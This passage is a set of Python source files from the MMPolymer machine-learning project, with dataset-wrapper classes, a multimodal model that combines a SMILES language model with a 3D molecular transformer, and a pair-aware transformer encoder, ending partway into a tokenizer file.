| 1,067 | Python | .py | 29 | 28.068966 | 88 | 0.598646 | FanmengWang/MMPolymer | 8 | 0 | 0 | GPL-3.0 | 9/5/2024, 10:49:00 PM (Europe/Amsterdam) |
2,290,143 | tta_dataset.py | FanmengWang_MMPolymer/MMPolymer/data/tta_dataset.py | # This source code is licensed under the GPL-3.0 license found in the
# LICENSE file in the root directory of this source tree.
import numpy as np
from functools import lru_cache
from unicore.data import BaseWrapperDataset
class TTADataset(BaseWrapperDataset):
def __init__(self, dataset, seed, atoms, coordinates, conf_size=10):
self.dataset = dataset
self.seed = seed
self.atoms = atoms
self.coordinates = coordinates
self.conf_size = conf_size
self.set_epoch(None)
def set_epoch(self, epoch, **unused):
super().set_epoch(epoch)
self.epoch = epoch
def __len__(self):
return len(self.dataset) * self.conf_size
@lru_cache(maxsize=16)
def __cached_item__(self, index: int, epoch: int):
smi_idx = index // self.conf_size
coord_idx = index % self.conf_size
atoms = np.array(self.dataset[smi_idx][self.atoms])
coordinates = np.array(self.dataset[smi_idx][self.coordinates][coord_idx])
smi = self.dataset[smi_idx]["smi"]
target = self.dataset[smi_idx]["target"]
input_ids = self.dataset[smi_idx]["input_ids"]
attention_mask = self.dataset[smi_idx]["attention_mask"]
return {
"atoms": atoms,
"coordinates": coordinates.astype(np.float32),
"smi": smi,
"target": target,
"input_ids": input_ids,
"attention_mask": attention_mask
}
def __getitem__(self, index: int):
return self.__cached_item__(index, self.epoch)
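    # Illustrative example: with conf_size=10, index 23 maps to molecule 23 // 10 = 2 and
    # conformer 23 % 10 = 3, i.e. each molecule is expanded into 10 test-time-augmentation samples.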
class TTADockingPoseDataset(BaseWrapperDataset):
def __init__(
self,
dataset,
atoms,
coordinates,
pocket_atoms,
pocket_coordinates,
holo_coordinates,
holo_pocket_coordinates,
is_train=True,
conf_size=10,
):
self.dataset = dataset
self.atoms = atoms
self.coordinates = coordinates
self.pocket_atoms = pocket_atoms
self.pocket_coordinates = pocket_coordinates
self.holo_coordinates = holo_coordinates
self.holo_pocket_coordinates = holo_pocket_coordinates
self.is_train = is_train
self.conf_size = conf_size
self.set_epoch(None)
def set_epoch(self, epoch, **unused):
super().set_epoch(epoch)
self.epoch = epoch
def __len__(self):
return len(self.dataset) * self.conf_size
@lru_cache(maxsize=16)
def __cached_item__(self, index: int, epoch: int):
smi_idx = index // self.conf_size
coord_idx = index % self.conf_size
atoms = np.array(self.dataset[smi_idx][self.atoms])
coordinates = np.array(self.dataset[smi_idx][self.coordinates][coord_idx])
pocket_atoms = np.array(
[item[0] for item in self.dataset[smi_idx][self.pocket_atoms]]
)
pocket_coordinates = np.array(self.dataset[smi_idx][self.pocket_coordinates][0])
if self.is_train:
holo_coordinates = np.array(self.dataset[smi_idx][self.holo_coordinates][0])
holo_pocket_coordinates = np.array(
self.dataset[smi_idx][self.holo_pocket_coordinates][0]
)
else:
holo_coordinates = coordinates
holo_pocket_coordinates = pocket_coordinates
smi = self.dataset[smi_idx]["smi"]
pocket = self.dataset[smi_idx]["pocket"]
return {
"atoms": atoms,
"coordinates": coordinates.astype(np.float32),
"pocket_atoms": pocket_atoms,
"pocket_coordinates": pocket_coordinates.astype(np.float32),
"holo_coordinates": holo_coordinates.astype(np.float32),
"holo_pocket_coordinates": holo_pocket_coordinates.astype(np.float32),
"smi": smi,
"pocket": pocket,
}
def __getitem__(self, index: int):
return self.__cached_item__(index, self.epoch)
| 3,964 | Python | .py | 98 | 31.306122 | 88 | 0.615967 | FanmengWang/MMPolymer | 8 | 0 | 0 | GPL-3.0 | 9/5/2024, 10:49:00 PM (Europe/Amsterdam) |
2,290,144 | key_dataset.py | FanmengWang_MMPolymer/MMPolymer/data/key_dataset.py | # This source code is licensed under the GPL-3.0 license found in the
# LICENSE file in the root directory of this source tree.
from functools import lru_cache
from unicore.data import BaseWrapperDataset
class KeyDataset(BaseWrapperDataset):
def __init__(self, dataset, key):
self.dataset = dataset
self.key = key
def __len__(self):
return len(self.dataset)
@lru_cache(maxsize=16)
def __getitem__(self, idx):
return self.dataset[idx][self.key]
| 497 | Python | .py | 13 | 33.153846 | 69 | 0.705637 | FanmengWang/MMPolymer | 8 | 0 | 0 | GPL-3.0 | 9/5/2024, 10:49:00 PM (Europe/Amsterdam) |
2,290,145 | lmdb_dataset.py | FanmengWang_MMPolymer/MMPolymer/data/lmdb_dataset.py | # This source code is licensed under the GPL-3.0 license found in the
# LICENSE file in the root directory of this source tree.
import lmdb
import os
import pickle
from functools import lru_cache
import logging
logger = logging.getLogger(__name__)
class LMDBDataset:
def __init__(self, db_path):
self.db_path = db_path
assert os.path.isfile(self.db_path), "{} not found".format(self.db_path)
env = self.connect_db(self.db_path)
with env.begin() as txn:
self._keys = list(txn.cursor().iternext(values=False))
def connect_db(self, lmdb_path, save_to_self=False):
env = lmdb.open(
lmdb_path,
subdir=False,
readonly=True,
lock=False,
readahead=False,
meminit=False,
max_readers=256,
)
if not save_to_self:
return env
else:
self.env = env
def __len__(self):
return len(self._keys)
@lru_cache(maxsize=16)
def __getitem__(self, idx):
if not hasattr(self, "env"):
self.connect_db(self.db_path, save_to_self=True)
datapoint_pickled = self.env.begin().get(f"{idx}".encode("ascii"))
data = pickle.loads(datapoint_pickled)
return data
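    # Illustrative usage (sketch; the path is hypothetical):
    #   dataset = LMDBDataset("./pretrain_data/PI1M.lmdb")
    #   sample = dataset[0]  # dict unpickled from the LMDB record, e.g. atoms / coordinates / input_ids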
| 1,286 | Python | .py | 38 | 25.921053 | 80 | 0.604351 | FanmengWang/MMPolymer | 8 | 0 | 0 | GPL-3.0 | 9/5/2024, 10:49:00 PM (Europe/Amsterdam) |
2,290,146 | cropping_dataset.py | FanmengWang_MMPolymer/MMPolymer/data/cropping_dataset.py | # This source code is licensed under the GPL-3.0 license found in the
# LICENSE file in the root directory of this source tree.
import numpy as np
from functools import lru_cache
import logging
from unicore.data import BaseWrapperDataset
from . import data_utils
logger = logging.getLogger(__name__)
class CroppingDataset(BaseWrapperDataset):
def __init__(self, dataset, seed, atoms, coordinates, max_atoms=256):
self.dataset = dataset
self.seed = seed
self.atoms = atoms
self.coordinates = coordinates
self.max_atoms = max_atoms
self.set_epoch(None)
def set_epoch(self, epoch, **unused):
super().set_epoch(epoch)
self.epoch = epoch
@lru_cache(maxsize=16)
def __cached_item__(self, index: int, epoch: int):
dd = self.dataset[index].copy()
atoms = dd[self.atoms]
coordinates = dd[self.coordinates]
if self.max_atoms and len(atoms) > self.max_atoms:
with data_utils.numpy_seed(self.seed, epoch, index):
index = np.random.choice(len(atoms), self.max_atoms, replace=False)
atoms = np.array(atoms)[index]
coordinates = coordinates[index]
dd[self.atoms] = atoms
dd[self.coordinates] = coordinates.astype(np.float32)
return dd
def __getitem__(self, index: int):
return self.__cached_item__(index, self.epoch)
class CroppingPocketDataset(BaseWrapperDataset):
def __init__(self, dataset, seed, atoms, coordinates, max_atoms=256):
self.dataset = dataset
self.seed = seed
self.atoms = atoms
self.coordinates = coordinates
self.max_atoms = (
max_atoms # max number of atoms in a molecule, None indicates no limit.
)
self.set_epoch(None)
def set_epoch(self, epoch, **unused):
super().set_epoch(epoch)
self.epoch = epoch
@lru_cache(maxsize=16)
def __cached_item__(self, index: int, epoch: int):
dd = self.dataset[index].copy()
atoms = dd[self.atoms]
coordinates = dd[self.coordinates]
residue = dd["residue"]
# crop atoms according to their distance to the center of pockets
if self.max_atoms and len(atoms) > self.max_atoms:
with data_utils.numpy_seed(self.seed, epoch, index):
distance = np.linalg.norm(
coordinates - coordinates.mean(axis=0), axis=1
)
def softmax(x):
x -= np.max(x)
x = np.exp(x) / np.sum(np.exp(x))
return x
distance += 1 # prevent inf
weight = softmax(np.reciprocal(distance))
index = np.random.choice(
len(atoms), self.max_atoms, replace=False, p=weight
)
atoms = atoms[index]
coordinates = coordinates[index]
residue = residue[index]
dd[self.atoms] = atoms
dd[self.coordinates] = coordinates.astype(np.float32)
dd["residue"] = residue
return dd
def __getitem__(self, index: int):
return self.__cached_item__(index, self.epoch)
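    # Note: atoms are subsampled with probability softmax of the reciprocal (smoothed) distance to
    # the pocket center, so atoms close to the center are kept preferentially when the pocket
    # exceeds max_atoms.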
class CroppingResiduePocketDataset(BaseWrapperDataset):
def __init__(self, dataset, seed, atoms, residues, coordinates, max_atoms=256):
self.dataset = dataset
self.seed = seed
self.atoms = atoms
self.residues = residues
self.coordinates = coordinates
self.max_atoms = (
max_atoms # max number of atoms in a molecule, None indicates no limit.
)
self.set_epoch(None)
def set_epoch(self, epoch, **unused):
super().set_epoch(epoch)
self.epoch = epoch
@lru_cache(maxsize=16)
def __cached_item__(self, index: int, epoch: int):
dd = self.dataset[index].copy()
atoms = dd[self.atoms]
residues = dd[self.residues]
coordinates = dd[self.coordinates]
residues_distance_map = {}
# crop atoms according to their distance to the center of pockets
if self.max_atoms and len(atoms) > self.max_atoms:
with data_utils.numpy_seed(self.seed, epoch, index):
distance = np.linalg.norm(
coordinates - coordinates.mean(axis=0), axis=1
)
residues_ids, residues_distance = [], []
for res in residues:
if res not in residues_ids:
residues_ids.append(res)
residues_distance.append(distance[residues == res].mean())
residues_ids = np.array(residues_ids)
residues_distance = np.array(residues_distance)
def softmax(x):
x -= np.max(x)
x = np.exp(x) / np.sum(np.exp(x))
return x
                residues_distance += 1  # prevent inf and smooth out the distances
weight = softmax(np.reciprocal(residues_distance))
max_residues = self.max_atoms // (len(atoms) // (len(residues_ids) + 1))
if max_residues < 1:
max_residues += 1
max_residues = min(max_residues, len(residues_ids))
residue_index = np.random.choice(
len(residues_ids), max_residues, replace=False, p=weight
)
index = [
i
for i in range(len(atoms))
if residues[i] in residues_ids[residue_index]
]
atoms = atoms[index]
coordinates = coordinates[index]
residues = residues[index]
dd[self.atoms] = atoms
dd[self.coordinates] = coordinates.astype(np.float32)
dd[self.residues] = residues
return dd
def __getitem__(self, index: int):
return self.__cached_item__(index, self.epoch)
class CroppingPocketDockingPoseDataset(BaseWrapperDataset):
def __init__(
self, dataset, seed, atoms, coordinates, holo_coordinates, max_atoms=256
):
self.dataset = dataset
self.seed = seed
self.atoms = atoms
self.coordinates = coordinates
self.holo_coordinates = holo_coordinates
self.max_atoms = max_atoms
self.set_epoch(None)
def set_epoch(self, epoch, **unused):
super().set_epoch(epoch)
self.epoch = epoch
@lru_cache(maxsize=16)
def __cached_item__(self, index: int, epoch: int):
dd = self.dataset[index].copy()
atoms = dd[self.atoms]
coordinates = dd[self.coordinates]
holo_coordinates = dd[self.holo_coordinates]
# crop atoms according to their distance to the center of pockets
if self.max_atoms and len(atoms) > self.max_atoms:
with data_utils.numpy_seed(self.seed, epoch):
distance = np.linalg.norm(
coordinates - coordinates.mean(axis=0), axis=1
)
def softmax(x):
x -= np.max(x)
x = np.exp(x) / np.sum(np.exp(x))
return x
distance += 1 # prevent inf
weight = softmax(np.reciprocal(distance))
index = np.random.choice(
len(atoms), self.max_atoms, replace=False, p=weight
)
atoms = atoms[index]
coordinates = coordinates[index]
holo_coordinates = holo_coordinates[index]
dd[self.atoms] = atoms
dd[self.coordinates] = coordinates.astype(np.float32)
dd[self.holo_coordinates] = holo_coordinates.astype(np.float32)
return dd
def __getitem__(self, index: int):
return self.__cached_item__(index, self.epoch)
| 7,889 | Python | .py | 182 | 31.659341 | 88 | 0.573664 | FanmengWang/MMPolymer | 8 | 0 | 0 | GPL-3.0 | 9/5/2024, 10:49:00 PM (Europe/Amsterdam) |
2,290,147 | normalize_dataset.py | FanmengWang_MMPolymer/MMPolymer/data/normalize_dataset.py | # This source code is licensed under the GPL-3.0 license found in the
# LICENSE file in the root directory of this source tree.
import numpy as np
from functools import lru_cache
from unicore.data import BaseWrapperDataset
class NormalizeDataset(BaseWrapperDataset):
def __init__(self, dataset, coordinates, normalize_coord=True):
self.dataset = dataset
self.coordinates = coordinates
self.normalize_coord = normalize_coord # normalize the coordinates.
self.set_epoch(None)
def set_epoch(self, epoch, **unused):
super().set_epoch(epoch)
self.epoch = epoch
@lru_cache(maxsize=16)
def __cached_item__(self, index: int, epoch: int):
dd = self.dataset[index].copy()
coordinates = dd[self.coordinates]
# normalize
if self.normalize_coord:
coordinates = coordinates - coordinates.mean(axis=0)
dd[self.coordinates] = coordinates.astype(np.float32)
return dd
def __getitem__(self, index: int):
return self.__cached_item__(index, self.epoch)
class NormalizeDockingPoseDataset(BaseWrapperDataset):
def __init__(
self,
dataset,
coordinates,
pocket_coordinates,
center_coordinates="center_coordinates",
):
self.dataset = dataset
self.coordinates = coordinates
self.pocket_coordinates = pocket_coordinates
self.center_coordinates = center_coordinates
self.set_epoch(None)
def set_epoch(self, epoch, **unused):
super().set_epoch(epoch)
self.epoch = epoch
@lru_cache(maxsize=16)
def __cached_item__(self, index: int, epoch: int):
dd = self.dataset[index].copy()
coordinates = dd[self.coordinates]
pocket_coordinates = dd[self.pocket_coordinates]
        # normalize molecule and pocket coordinates, aligning both with the pocket center
center_coordinates = pocket_coordinates.mean(axis=0)
coordinates = coordinates - center_coordinates
pocket_coordinates = pocket_coordinates - center_coordinates
dd[self.coordinates] = coordinates.astype(np.float32)
dd[self.pocket_coordinates] = pocket_coordinates.astype(np.float32)
dd[self.center_coordinates] = center_coordinates.astype(np.float32)
return dd
def __getitem__(self, index: int):
return self.__cached_item__(index, self.epoch)
| 2,427 | Python | .py | 56 | 35.785714 | 92 | 0.679237 | FanmengWang/MMPolymer | 8 | 0 | 0 | GPL-3.0 | 9/5/2024, 10:49:00 PM (Europe/Amsterdam) |
2,290,148 | MMPolymer.py | FanmengWang_MMPolymer/MMPolymer/models/MMPolymer.py | # This source code is licensed under the GPL-3.0 license found in the
# LICENSE file in the root directory of this source tree.
import logging
import torch
from sklearn.manifold import TSNE
import matplotlib.pyplot as plt
import torch.nn as nn
import torch.nn.functional as F
from unicore import utils
from unicore.models import BaseUnicoreModel, register_model, register_model_architecture
from unicore.modules import LayerNorm, init_bert_params
from .transformer_encoder_with_pair import TransformerEncoderWithPair
from typing import Dict, Any, List
from transformers import AdamW, get_linear_schedule_with_warmup, RobertaModel, RobertaConfig, RobertaTokenizer
from transformers import AutoModel, AutoConfig
from .PolymerSmilesTokenization import PolymerSmilesTokenizer
logger = logging.getLogger(__name__)
@register_model("MMPolymer")
class MMPolymerModel(BaseUnicoreModel):
@staticmethod
def add_args(parser):
"""Add model-specific arguments to the parser."""
parser.add_argument(
"--encoder-layers", type=int, metavar="L", help="num encoder layers"
)
parser.add_argument(
"--encoder-embed-dim",
type=int,
metavar="H",
help="encoder embedding dimension",
)
parser.add_argument(
"--encoder-ffn-embed-dim",
type=int,
metavar="F",
help="encoder embedding dimension for FFN",
)
parser.add_argument(
"--encoder-attention-heads",
type=int,
metavar="A",
help="num encoder attention heads",
)
parser.add_argument(
"--activation-fn",
choices=utils.get_available_activation_fns(),
help="activation function to use",
)
parser.add_argument(
"--pooler-activation-fn",
choices=utils.get_available_activation_fns(),
help="activation function to use for pooler layer",
)
parser.add_argument(
"--emb-dropout",
type=float,
metavar="D",
help="dropout probability for embeddings",
)
parser.add_argument(
"--dropout", type=float, metavar="D", help="dropout probability"
)
parser.add_argument(
"--attention-dropout",
type=float,
metavar="D",
help="dropout probability for attention weights",
)
parser.add_argument(
"--activation-dropout",
type=float,
metavar="D",
help="dropout probability after activation in FFN",
)
parser.add_argument(
"--pooler-dropout",
type=float,
metavar="D",
help="dropout probability in the masked_lm pooler layers",
)
parser.add_argument(
"--max-seq-len", type=int, help="number of positional embeddings to learn"
)
parser.add_argument(
"--post-ln", type=bool, help="use post layernorm or pre layernorm"
)
parser.add_argument(
"--masked-token-loss",
type=float,
metavar="D",
help="mask loss ratio",
)
parser.add_argument(
"--masked-dist-loss",
type=float,
metavar="D",
help="masked distance loss ratio",
)
parser.add_argument(
"--masked-coord-loss",
type=float,
metavar="D",
help="masked coord loss ratio",
)
parser.add_argument(
"--x-norm-loss",
type=float,
metavar="D",
help="x norm loss ratio",
)
parser.add_argument(
"--delta-pair-repr-norm-loss",
type=float,
metavar="D",
help="delta encoder pair repr norm loss ratio",
)
parser.add_argument(
"--masked-coord-dist-loss",
type=float,
metavar="D",
help="masked coord dist loss ratio",
)
parser.add_argument(
"--mode",
type=str,
default="train",
choices=["train", "infer"],
)
def __init__(self, args, dictionary):
super().__init__()
base_architecture(args)
self.args = args
self.padding_idx = dictionary.pad()
self.embed_tokens = nn.Embedding(
len(dictionary), args.encoder_embed_dim, self.padding_idx
)
self._num_updates = None
# 1D net
self.tokenizer = PolymerSmilesTokenizer.from_pretrained("roberta-base", max_len=411)
self.config = AutoConfig.from_pretrained("./MMPolymer/models/config")
self.PretrainedModel = RobertaModel(config=self.config)
self.PretrainedModel.config.hidden_dropout_prob = 0.1
self.PretrainedModel.config.attention_probs_dropout_prob = 0.1
self.PretrainedModel.resize_token_embeddings(len(self.tokenizer))
# 3D net
self.encoder = TransformerEncoderWithPair(
encoder_layers=args.encoder_layers,
embed_dim=args.encoder_embed_dim,
ffn_embed_dim=args.encoder_ffn_embed_dim,
attention_heads=args.encoder_attention_heads,
emb_dropout=args.emb_dropout,
dropout=args.dropout,
attention_dropout=args.attention_dropout,
activation_dropout=args.activation_dropout,
max_seq_len=args.max_seq_len,
activation_fn=args.activation_fn,
no_final_head_layer_norm=args.delta_pair_repr_norm_loss < 0,
)
K = 128
n_edge_type = len(dictionary) * len(dictionary)
self.gbf_proj = NonLinearHead(
K, args.encoder_attention_heads, args.activation_fn
)
self.gbf = GaussianLayer(K, n_edge_type)
self.seq_layer = NonLinearHead(
768, 512, args.activation_fn
)
self.space_layer = NonLinearHead(
512, 512, args.activation_fn
)
self.classification_head = nn.Sequential(
nn.Dropout(0.1),
nn.Linear(1024, 1024),
nn.SiLU(),
nn.Linear(1024, 1)
)
if args.masked_token_loss > 0:
self.lm_head = MaskLMHead(
embed_dim=args.encoder_embed_dim,
output_dim=len(dictionary),
activation_fn=args.activation_fn,
weight=None,
)
if args.masked_coord_loss > 0:
self.pair2coord_proj = NonLinearHead(
args.encoder_attention_heads, 1, args.activation_fn
)
if args.masked_dist_loss > 0:
self.dist_head = DistanceHead(
args.encoder_attention_heads, args.activation_fn
)
self.apply(init_bert_params)
@classmethod
def build_model(cls, args, task):
"""Build a new model instance."""
return cls(args, task.dictionary)
def forward(
self,
src_tokens,
src_distance,
src_coord,
src_edge_type,
src_input_ids,
src_attention_mask,
encoder_masked_tokens=None,
features_only=False,
classification_head_name=None,
**kwargs
):
if classification_head_name is not None:
features_only = True
padding_mask = src_tokens.eq(self.padding_idx)
if not padding_mask.any():
padding_mask = None
x = self.embed_tokens(src_tokens)
def get_dist_features(dist, et):
n_node = dist.size(-1)
gbf_feature = self.gbf(dist, et)
gbf_result = self.gbf_proj(gbf_feature)
graph_attn_bias = gbf_result
graph_attn_bias = graph_attn_bias.permute(0, 3, 1, 2).contiguous()
graph_attn_bias = graph_attn_bias.view(-1, n_node, n_node)
return graph_attn_bias
graph_attn_bias = get_dist_features(src_distance, src_edge_type)
(
encoder_rep,
encoder_pair_rep,
delta_encoder_pair_rep,
x_norm,
delta_encoder_pair_rep_norm,
) = self.encoder(x, padding_mask=padding_mask, attn_mask=graph_attn_bias)
encoder_pair_rep[encoder_pair_rep == float("-inf")] = 0
seq_rep = self.PretrainedModel(input_ids=src_input_ids, attention_mask=src_attention_mask).last_hidden_state
encoder_distance = None
encoder_coord = None
if not features_only:
if self.args.masked_token_loss > 0:
logits = self.lm_head(encoder_rep, encoder_masked_tokens)
if self.args.masked_coord_loss > 0:
coords_emb = src_coord
if padding_mask is not None:
atom_num = (torch.sum(1 - padding_mask.type_as(x), dim=1) - 1).view(
-1, 1, 1, 1
)
else:
atom_num = src_coord.shape[1] - 1
delta_pos = coords_emb.unsqueeze(1) - coords_emb.unsqueeze(2)
attn_probs = self.pair2coord_proj(delta_encoder_pair_rep)
coord_update = delta_pos / atom_num * attn_probs
coord_update = torch.sum(coord_update, dim=2)
encoder_coord = coords_emb + coord_update
if self.args.masked_dist_loss > 0:
encoder_distance = self.dist_head(encoder_pair_rep)
seq_output = self.seq_layer(seq_rep.detach())
space_output = self.space_layer(encoder_rep.detach())
if classification_head_name is not None:
seq_output = self.seq_layer(seq_rep)
space_output = self.space_layer(encoder_rep)
mol_output = torch.cat((seq_output[:, 0, :], space_output[:, 0, :]), dim=-1)
logits = self.classification_head(mol_output)
if self.args.mode == 'infer':
return encoder_rep, encoder_pair_rep
else:
return (
logits,
encoder_distance,
encoder_coord,
x_norm,
delta_encoder_pair_rep_norm,
seq_output[:, 0, :],
space_output[:, 0, :],
)
def set_num_updates(self, num_updates):
"""State from trainer to pass along to model at every update."""
self._num_updates = num_updates
def get_num_updates(self):
return self._num_updates
class MaskLMHead(nn.Module):
"""Head for masked language modeling."""
def __init__(self, embed_dim, output_dim, activation_fn, weight=None):
super().__init__()
self.dense = nn.Linear(embed_dim, embed_dim)
self.activation_fn = utils.get_activation_fn(activation_fn)
self.layer_norm = LayerNorm(embed_dim)
if weight is None:
weight = nn.Linear(embed_dim, output_dim, bias=False).weight
self.weight = weight
self.bias = nn.Parameter(torch.zeros(output_dim))
def forward(self, features, masked_tokens=None, **kwargs):
# Only project the masked tokens while training,
# saves both memory and computation
if masked_tokens is not None:
features = features[masked_tokens, :]
x = self.dense(features)
x = self.activation_fn(x)
x = self.layer_norm(x)
# project back to size of vocabulary with bias
x = F.linear(x, self.weight) + self.bias
return x
class NonLinearHead(nn.Module):
"""Head for simple classification tasks."""
def __init__(
self,
input_dim,
out_dim,
activation_fn,
hidden=None,
):
super().__init__()
hidden = input_dim if not hidden else hidden
self.linear1 = nn.Linear(input_dim, hidden)
self.linear2 = nn.Linear(hidden, out_dim)
self.activation_fn = utils.get_activation_fn(activation_fn)
def forward(self, x):
x = self.linear1(x)
x = self.activation_fn(x)
x = self.linear2(x)
return x
class DistanceHead(nn.Module):
def __init__(
self,
heads,
activation_fn,
):
super().__init__()
self.dense = nn.Linear(heads, heads)
self.layer_norm = nn.LayerNorm(heads)
self.out_proj = nn.Linear(heads, 1)
self.activation_fn = utils.get_activation_fn(activation_fn)
def forward(self, x):
bsz, seq_len, seq_len, _ = x.size()
# x[x == float('-inf')] = 0
x = self.dense(x)
x = self.activation_fn(x)
x = self.layer_norm(x)
x = self.out_proj(x).view(bsz, seq_len, seq_len)
x = (x + x.transpose(-1, -2)) * 0.5
return x
@torch.jit.script
def gaussian(x, mean, std):
pi = 3.14159
a = (2 * pi) ** 0.5
return torch.exp(-0.5 * (((x - mean) / std) ** 2)) / (a * std)
class GaussianLayer(nn.Module):
def __init__(self, K=128, edge_types=1024):
super().__init__()
self.K = K
self.means = nn.Embedding(1, K)
self.stds = nn.Embedding(1, K)
self.mul = nn.Embedding(edge_types, 1)
self.bias = nn.Embedding(edge_types, 1)
nn.init.uniform_(self.means.weight, 0, 3)
nn.init.uniform_(self.stds.weight, 0, 3)
nn.init.constant_(self.bias.weight, 0)
nn.init.constant_(self.mul.weight, 1)
def forward(self, x, edge_type):
mul = self.mul(edge_type).type_as(x)
bias = self.bias(edge_type).type_as(x)
x = mul * x.unsqueeze(-1) + bias
x = x.expand(-1, -1, -1, self.K)
mean = self.means.weight.float().view(-1)
std = self.stds.weight.float().view(-1).abs() + 1e-5
return gaussian(x.float(), mean, std).type_as(self.means.weight)
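# Editorial note (not part of the original source): GaussianLayer expands each pairwise
# distance x into K Gaussian basis features. With the edge-type-dependent affine map above,
# the k-th channel is
#     phi_k(x) = exp(-0.5 * ((mul_e * x + bias_e - mean_k) / std_k) ** 2) / (sqrt(2 * pi) * std_k)
# which is exactly what the jit-scripted `gaussian` helper evaluates; the K features are then
# projected by `gbf_proj` into the per-head attention biases used by the 3D encoder.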
@register_model_architecture("MMPolymer", "MMPolymer")
def base_architecture(args):
args.encoder_layers = getattr(args, "encoder_layers", 15)
args.encoder_embed_dim = getattr(args, "encoder_embed_dim", 512)
args.encoder_ffn_embed_dim = getattr(args, "encoder_ffn_embed_dim", 2048)
args.encoder_attention_heads = getattr(args, "encoder_attention_heads", 64)
args.dropout = getattr(args, "dropout", 0.1)
args.emb_dropout = getattr(args, "emb_dropout", 0.1)
args.attention_dropout = getattr(args, "attention_dropout", 0.1)
args.activation_dropout = getattr(args, "activation_dropout", 0.0)
args.pooler_dropout = getattr(args, "pooler_dropout", 0.0)
args.max_seq_len = getattr(args, "max_seq_len", 512)
args.activation_fn = getattr(args, "activation_fn", "gelu")
args.pooler_activation_fn = getattr(args, "pooler_activation_fn", "tanh")
args.post_ln = getattr(args, "post_ln", False)
args.masked_token_loss = getattr(args, "masked_token_loss", -1.0)
args.masked_coord_loss = getattr(args, "masked_coord_loss", -1.0)
args.masked_dist_loss = getattr(args, "masked_dist_loss", -1.0)
args.x_norm_loss = getattr(args, "x_norm_loss", -1.0)
args.delta_pair_repr_norm_loss = getattr(args, "delta_pair_repr_norm_loss", -1.0)
@register_model_architecture("MMPolymer", "MMPolymer_base")
def MMPolymer_base_architecture(args):
base_architecture(args)
| 15,358 | Python | .py | 386 | 29.608808 | 116 | 0.586082 | FanmengWang/MMPolymer | 8 | 0 | 0 | GPL-3.0 | 9/5/2024, 10:49:00 PM (Europe/Amsterdam) |
2,290,149 | transformer_encoder_with_pair.py | FanmengWang_MMPolymer/MMPolymer/models/transformer_encoder_with_pair.py | # This source code is licensed under the GPL-3.0 license found in the
# LICENSE file in the root directory of this source tree.
from typing import Optional
import math
import torch
import torch.nn as nn
import torch.nn.functional as F
from unicore.modules import TransformerEncoderLayer, LayerNorm
class TransformerEncoderWithPair(nn.Module):
def __init__(
self,
encoder_layers: int = 6,
embed_dim: int = 768,
ffn_embed_dim: int = 3072,
attention_heads: int = 8,
emb_dropout: float = 0.1,
dropout: float = 0.1,
attention_dropout: float = 0.1,
activation_dropout: float = 0.0,
max_seq_len: int = 256,
activation_fn: str = "gelu",
post_ln: bool = False,
no_final_head_layer_norm: bool = False,
) -> None:
super().__init__()
self.emb_dropout = emb_dropout
self.max_seq_len = max_seq_len
self.embed_dim = embed_dim
self.attention_heads = attention_heads
self.emb_layer_norm = LayerNorm(self.embed_dim)
if not post_ln:
self.final_layer_norm = LayerNorm(self.embed_dim)
else:
self.final_layer_norm = None
if not no_final_head_layer_norm:
self.final_head_layer_norm = LayerNorm(attention_heads)
else:
self.final_head_layer_norm = None
self.layers = nn.ModuleList(
[
TransformerEncoderLayer(
embed_dim=self.embed_dim,
ffn_embed_dim=ffn_embed_dim,
attention_heads=attention_heads,
dropout=dropout,
attention_dropout=attention_dropout,
activation_dropout=activation_dropout,
activation_fn=activation_fn,
post_ln=post_ln,
)
for _ in range(encoder_layers)
]
)
def forward(
self,
emb: torch.Tensor,
attn_mask: Optional[torch.Tensor] = None,
padding_mask: Optional[torch.Tensor] = None,
) -> torch.Tensor:
bsz = emb.size(0)
seq_len = emb.size(1)
x = self.emb_layer_norm(emb)
x = F.dropout(x, p=self.emb_dropout, training=self.training)
# account for padding while computing the representation
if padding_mask is not None:
x = x * (1 - padding_mask.unsqueeze(-1).type_as(x))
input_attn_mask = attn_mask
input_padding_mask = padding_mask
def fill_attn_mask(attn_mask, padding_mask, fill_val=float("-inf")):
if attn_mask is not None and padding_mask is not None:
# merge key_padding_mask and attn_mask
attn_mask = attn_mask.view(x.size(0), -1, seq_len, seq_len)
attn_mask.masked_fill_(
padding_mask.unsqueeze(1).unsqueeze(2).to(torch.bool),
fill_val,
)
attn_mask = attn_mask.view(-1, seq_len, seq_len)
padding_mask = None
return attn_mask, padding_mask
assert attn_mask is not None
attn_mask, padding_mask = fill_attn_mask(attn_mask, padding_mask)
for i in range(len(self.layers)):
x, attn_mask, _ = self.layers[i](
x, padding_mask=padding_mask, attn_bias=attn_mask, return_attn=True
)
def norm_loss(x, eps=1e-10, tolerance=1.0):
x = x.float()
max_norm = x.shape[-1] ** 0.5
norm = torch.sqrt(torch.sum(x**2, dim=-1) + eps)
error = torch.nn.functional.relu((norm - max_norm).abs() - tolerance)
return error
def masked_mean(mask, value, dim=-1, eps=1e-10):
return (
torch.sum(mask * value, dim=dim) / (eps + torch.sum(mask, dim=dim))
).mean()
x_norm = norm_loss(x)
if input_padding_mask is not None:
token_mask = 1.0 - input_padding_mask.float()
else:
token_mask = torch.ones_like(x_norm, device=x_norm.device)
x_norm = masked_mean(token_mask, x_norm)
if self.final_layer_norm is not None:
x = self.final_layer_norm(x)
delta_pair_repr = attn_mask - input_attn_mask
delta_pair_repr, _ = fill_attn_mask(delta_pair_repr, input_padding_mask, 0)
attn_mask = (
attn_mask.view(bsz, -1, seq_len, seq_len).permute(0, 2, 3, 1).contiguous()
)
delta_pair_repr = (
delta_pair_repr.view(bsz, -1, seq_len, seq_len)
.permute(0, 2, 3, 1)
.contiguous()
)
pair_mask = token_mask[..., None] * token_mask[..., None, :]
delta_pair_repr_norm = norm_loss(delta_pair_repr)
delta_pair_repr_norm = masked_mean(
pair_mask, delta_pair_repr_norm, dim=(-1, -2)
)
if self.final_head_layer_norm is not None:
delta_pair_repr = self.final_head_layer_norm(delta_pair_repr)
return x, attn_mask, delta_pair_repr, x_norm, delta_pair_repr_norm
| 5,102 | Python | .py | 121 | 31.107438 | 86 | 0.566331 | FanmengWang/MMPolymer | 8 | 0 | 0 | GPL-3.0 | 9/5/2024, 10:49:00 PM (Europe/Amsterdam) |
2,290,150 | PolymerSmilesTokenization.py | FanmengWang_MMPolymer/MMPolymer/models/PolymerSmilesTokenization.py | # This source code is licensed under the GPL-3.0 license found in the
# LICENSE file in the root directory of this source tree.
import json
import os
from functools import lru_cache
from typing import List, Optional, Tuple
import regex as re
from transformers import AddedToken, PreTrainedTokenizer
import logging
from transformers import RobertaTokenizer
logger = logging.getLogger(__name__)
VOCAB_FILES_NAMES = {
